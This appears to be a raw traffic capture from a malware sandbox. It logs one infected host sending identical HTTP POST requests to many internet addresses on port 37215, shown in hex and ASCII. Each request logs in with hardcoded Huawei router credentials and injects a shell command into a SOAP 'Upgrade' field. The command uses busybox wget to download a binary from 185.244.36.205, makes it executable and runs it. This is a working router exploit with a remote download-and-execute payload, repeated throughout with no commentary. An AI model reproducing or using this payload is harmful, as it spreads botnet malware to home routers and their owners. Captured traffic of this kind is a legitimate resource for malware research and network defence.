                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              576192.168.2.155548494.18.175.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.723442078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              577192.168.2.1558564157.79.247.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.723460913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              578192.168.2.1549968190.163.102.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.723500967 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              579192.168.2.155713445.151.155.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222543955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              580192.168.2.1536986181.25.166.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222543955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              581192.168.2.155789041.84.25.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222572088 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              582192.168.2.1549642197.227.150.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222594023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              583192.168.2.1535460197.254.39.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222594023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              584192.168.2.154079241.149.172.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222625017 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              585192.168.2.1538250181.1.127.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222647905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
